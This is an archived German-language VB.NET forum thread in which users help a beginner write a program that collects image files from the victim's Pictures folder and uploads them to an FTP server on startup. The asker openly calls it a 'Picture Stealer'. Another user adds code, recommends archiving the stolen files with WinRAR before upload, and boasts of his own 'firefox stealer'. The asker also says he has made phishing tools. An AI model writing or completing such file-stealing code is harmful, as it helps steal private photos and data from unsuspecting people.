PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [VB.NET][Help]Dateien aus Listbox uploaden?



NavanBethrax
20.08.2009, 21:30
Wie kann ich die dateien die ich in listbox1 eingelesen hab
anschließend auf einen FTP server Uploaden lassen ??

Mein bisheriger Code:


Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
For Each foundFile As String In My.Computer.FileSystem.GetFiles _
(My.Computer.FileSystem.SpecialDirectories.MyPictu res)
ListBox1.Items.Add(foundFile)

Next

Sawyer
20.08.2009, 21:38
Einfach die Einträge Durchlaufen lassen , und jede Datei Hochladen



For Each Eintrag As String In ListBox1.Items
My.Computer.Network.UploadFile(Eintrag, "ftp://" & "ftp host", "Benutzername", "Passwort")
NextMfG

NavanBethrax
20.08.2009, 22:00
Die Adresse für UploadFile muss einen Dateinamen enthalten.

Kommt bei:

My.Computer.Network.UploadFile(Eintrag, "ftp://meinftp.de", "meinlogin", "meinpw")

Auch wenn ich nicht verstehe wo der fehler liegt weil wenn ichs mir angucke
müsste es so funktionieren.

Sawyer
20.08.2009, 22:05
Ja , ich habe vergessen noch einen Dateinamen anzugeben , also wie die Datei auf dem Server dann heißen soll , das beste wäre dann von der aktuellen Datei eine FileInfo zu machen , und den selben Namen der aktuellen Datei zu verwenden


Dim fi As New IO.FileInfo(Eintrag)
My.Computer.Network.UploadFile(Eintrag, "ftp://meinftp.de" & "/" & fi.Name, "meinlogin", "meinpw")MfG

NavanBethrax
20.08.2009, 22:52
Ist es vllt möglich eine bestimmte gruppe an dateien aus einem Ordner zu suchen also in meinem fall bild dateien (jpg,bmp,gif,u.s.w.) Und diese dann auf den FTP server zu Uploaden ??

Sawyer
20.08.2009, 22:58
Ja , das geht , Prüfe vor dem Hochladen einfach ab , ob der Dateityp eine jpg oder bmp ist.

Natürlich kannst du auch mehrere Datentypen abfragen



If (fi.Extension = ".bmp" Or fi.Extension = ".jpg") Then
' Hochladen
End IfMfG

NavanBethrax
20.08.2009, 23:28
Jetzt muss ich nurnoch


If (fi.Extension = ".bmp" Or fi.Extension = ".jpg") Then
In meinen Code:



Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
For Each foundFile As String In My.Computer.FileSystem.GetFiles _
(My.Computer.FileSystem.SpecialDirectories.MyPictu res)
ListBox1.Items.Add(foundFile)

Next


For Each Eintrag As String In ListBox1.Items
Dim fi As New IO.FileInfo(Eintrag)
My.Computer.Network.UploadFile(Eintrag, "ftp://ftp.meinftp.de" & "/" & fi.Name, "meinftplogin", "meinftppw")

Next

End Sub

End ClassMit einbringen ...

Dann fehlen noch die beiden Funktionen das Programm nach einer gewissen zeit zu beenden was ich auch selber mit nem Timer machen kann.

Und mir fehlt der Direkt Pfad zu Eigene Dateien an der stelle:


(My.Computer.FileSystem.SpecialDirectories.MyPictu res)Oda vllt eine bessere Variante wäre MyPictures + Desktop und 2 Untergeordnete Ordner nach Bildern zu dürchforsten was dann aba möglicher weise eine menge funde gibt die dann hochgeladen werden müssten . Ich frage mich was die beste lösung für einen Picture Stealer wäre ...

MfG NavanBethrax

LeadOr
20.08.2009, 23:50
Dim fileinfo As New DirectoryInfo("C:\bilder\")
Dim files As Array = fileinfo.GetFiles("*.jpg")da haste alle datein aus dem ordner in einem array und kannst diese besser durchlaufen lassen ;)

vlt so (ungetestet^^)




For i as integer = 0 to files.getupperbound(0)
My.Computer.Network.UploadFile("C:\bilder\", "ftp://ftp.meinftp.de" & "/" & files(i), "meinftplogin", "meinftppw")
nextdu kannst aber auch einfach nur jpgs in die listbox laden


For i as integer = 0 to files.getupperbound(0)
ListBox1.items.add("C:\bilder\" & files(i))
next

was ich dir empfehlen würde wäre:

1. winrar in dein programm einbinden
2. alle datein in einen ordner kopieren
3. den ordner raren
4. hochladen ;)

so hab ih mir meinem firefox stealer gebastelt ;D

NavanBethrax
22.08.2009, 15:49
was ich dir empfehlen würde wäre:

1. winrar in dein programm einbinden
2. alle datein in einen ordner kopieren
3. den ordner raren
4. hochladen ;)

Könnte mir wer erklären wie ich winrar einbinden kann und was ich verändern müsste ...

hab bis jetzt erst einma was eingebunden ... bin auchnoch ziemlich am anfang das einzige was ich bis jetzt gemacht hab waren 1-2 phishing tools und ein paar GUI's für in AutoIt geschriebene Tools ...

MfG NavanBethrax